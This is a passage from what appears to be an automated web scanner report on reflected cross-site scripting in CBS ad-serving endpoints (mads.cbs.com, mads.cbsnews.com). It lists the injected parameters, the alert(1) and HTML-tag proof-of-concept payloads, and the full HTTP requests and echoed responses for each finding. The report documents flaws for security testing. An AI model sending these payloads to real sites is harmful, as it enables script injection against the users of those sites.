The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload a3b8f<a>da035d8922a was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164a3b8f<a>da035d8922a&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:02 GMT
Server: Apache/2.2
Content-Length: 542
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:02 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164a3b8f<a>da035d8922a&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=68175691&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BRAND=&qu
...[SNIP]...

3.531. http://mads.cbs.com/mac-ad [cookiesOn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into a JavaScript inline comment. The payload 5ee49*/alert(1)//599271d3ede was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=15ee49*/alert(1)//599271d3ede&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:52 GMT
Server: Apache/2.2
Content-Length: 607
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:52 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=15ee49*/alert(1)//599271d3ede&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) */;window.CBSI_PAGES
...[SNIP]...

3.532. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript inline comment. The payload f33d5*/alert(1)//96da6033706 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1&f33d5*/alert(1)//96da6033706=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:17:06 GMT
Server: Apache/2.2
Content-Length: 610
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:17:06 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=49351159&ADREQ&beacon=1&cookiesOn=1&f33d5*/alert(1)//96da6033706=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1|3462;BC3462-15|;cbs.com;;|';/* MAC [r20101202-0915-
...[SNIP]...

3.533. http://mads.cbs.com/mac-ad [x-cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbs.com
Path:	/mac-ad

Issue detail

The value of the x-cb request parameter is copied into a JavaScript inline comment. The payload 1f5fb*/alert(1)//50ccf9f3d4f was submitted in the x-cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=493511591f5fb*/alert(1)//50ccf9f3d4f&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ABTEST_HOMEPAGE=S; CBS_ADV_VAL=a; MADTEST=1; __utmz=235293011.1303946085.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=235293011.1320039961.1303946085.1303946085.1303946085.1; __utmc=235293011; __utmb=235293011.1.10.1303946085

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:16:59 GMT
Server: Apache/2.2
Content-Length: 607
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:16:59 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C3462%3BBC3462-15%7C%3Bcbs.com%3B%3B%7C&SITE=164&PTYPE=2000&BRAND=57&DVAR_SESSION=a&DVAR_GENRE=&NCAT=1%3A&NODE=1&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=493511591f5fb*/alert(1)//50ccf9f3d4f&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='164' PTYPE='2000' NCAT='1:' CID='' TO BEACON TEXT) */;window.CBSI_PAGESTATE='1|3462;BC3462-15|;cbs.com;;|
...[SNIP]...

3.534. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload aff01<a>cd2859870e7 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80aff01<a>cd2859870e7&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:25 GMT
Server: Apache/2.2
Content-Length: 607
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80aff01<a>cd2859870e7&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='800128598707' CNET-PTYPE='00' POS='100' NCAT='100:' CNET-PARTNER-ID='1' DVAR_PSID='
...[SNIP]...

3.535. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&SP request parameter is copied into a JavaScript inline comment. The payload 542fa*/alert(1)//1ac60a70ddd was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=34303121&ADREQ&SP=110542fa*/alert(1)//1ac60a70ddd&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:51 GMT
Server: Apache/2.2
Content-Length: 694
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=34303121&ADREQ&SP=110542fa*/alert(1)//1ac60a70ddd&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBSNEWS' BRAND='55' SITE='162' SP='110542116070' CNET-PTYPE='00' POS='100' NCAT='100:' CNET-PARTNER-ID='1' DVAR_PSID='
...[SNIP]...

3.536. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into a JavaScript inline comment. The payload 2944a*/alert(1)//1e31543d18e was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=12944a*/alert(1)//1e31543d18e&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:20:06 GMT
Server: Apache/2.2
Content-Length: 594
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:20:06 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=1%7C78%7C%3Bcbsnews.com%3B%3B%7C&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=51611017&ADREQ&beacon=12944a*/alert(1)//1e31543d18e&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='12944113154318' SPECIFIED. BEACON CALL FAILED. */;window.CBSI_PAGESTATE='1|78|;cbsnews.com;;|';/* MAC [r20101202-0915-v1-13-13-JsonEnco
...[SNIP]...

3.537. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload c0ba6<a>b224db52369 was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1c0ba6<a>b224db52369&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:25:35 GMT
Server: Apache/2.2
Content-Length: 577
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:25:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=55&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1c0ba6<a>b224db52369&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: INCORRECT BEACON='10622452369' SPECIFIED. BEACON CALL FAILED. *//* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw17.cnet.com::1585461
...[SNIP]...

3.538. http://mads.cbsnews.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into the HTML document as plain text between tags. The payload 2a31f<a>6476b586d8c was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=552a31f<a>6476b586d8c&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/stories/2011/04/27/scitech/main20057741.shtml?tag=stack
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1; __qca=P0-1316227078-1303946256714; AxData=; Axxd=1; MADCAPP=0b1Qte=4; mad_rsi_segs=ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10562; XCLGFbrowser=Cg8JIk24ijttAAAASDs; __utmb=37725042; __utmc=37725042; __utma=37725042.1876633410.1303946274.1303946274.1303946274.1; __utmz=37725042.1303946284.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:21:27 GMT
Server: Apache/2.2
Content-Length: 601
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:21:27 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=552a31f<a>6476b586d8c&DVAR_CID=20057741&NCAT=205%3A&NODE=205&PTYPE=2100&CNET-PAGE-GUID=1303946298882326019921107&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=60246753&IREFER_HOST=cbsnews.com&AD
...[SNIP]...

3.539. http://mads.cbsnews.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript inline comment. The payload 60315*/alert(1)//3f19c4e9293 was submitted in the BRAND parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=5560315*/alert(1)//3f19c4e9293&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:55 GMT
Server: Apache/2.2
Content-Length: 1143
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:55 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=5560315*/alert(1)//3f19c4e9293&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0" */document.write('<!-- defau
...[SNIP]...

3.540. http://mads.cbsnews.com/mac-ad [BRAND parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the BRAND request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24446'%3balert(1)//fe8c7d069e was submitted in the BRAND parameter. This input was echoed as 24446';alert(1)//fe8c7d069e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=5524446'%3balert(1)//fe8c7d069e&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:53 GMT
Server: Apache/2.2
Content-Length: 1143
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 27 Apr 2011 23:18:53 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=162&BRAND=5524446'%3balert(1)//fe8c7d069e&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=130394623276045102
...[SNIP]...
<img alt="" height="0" src="http://adlog.com.com/adlog/i/r=14617&sg=1815&o=100%253a&h=cn&p=2&b=5524446';alert(1)//fe8c7d069e&l=en_US&site=162&pt=2000&nd=100&pid=&cid=0&pp=100&e=&rqid=01phx1-ad-e20:4DB897D6CE927&orh=cbsnews.com&ort=&oepartner=&epartner=&ppartner=&pd
...[SNIP]...

3.541. http://mads.cbsnews.com/mac-ad [CELT parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

The value of the CELT request parameter is copied into the HTML document as plain text between tags. The payload 5bd1e<a>2df23b6363e was submitted in the CELT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js5bd1e<a>2df23b6363e&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbsnews.com
Proxy-Connection: keep-alive
Referer: http://www.cbsnews.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 27 Apr 2011 23:18:03 GMT
Server: Apache/2.2
Content-Length: 547
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: text/plain
Expires: Wed, 27 Apr 2011 23:18:03 GMT

<!-- NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js5bd1e<a>2df23b6363e&PAGESTATE=&SITE=162&BRAND=55&CID=0&NCAT=100%3A&NODE=100&PTYPE=2000&CNET-PAGE-GUID=1303946232760451020641252&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=96345145&ADREQ&SP=80&POS=100&cookiesOn=1" _REQ_NUM="0"
...[SNIP]...

3.542. http://mads.cbsnews.com/mac-ad [CID parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://mads.cbsnews.com
Path:	/mac-ad

Issue detail

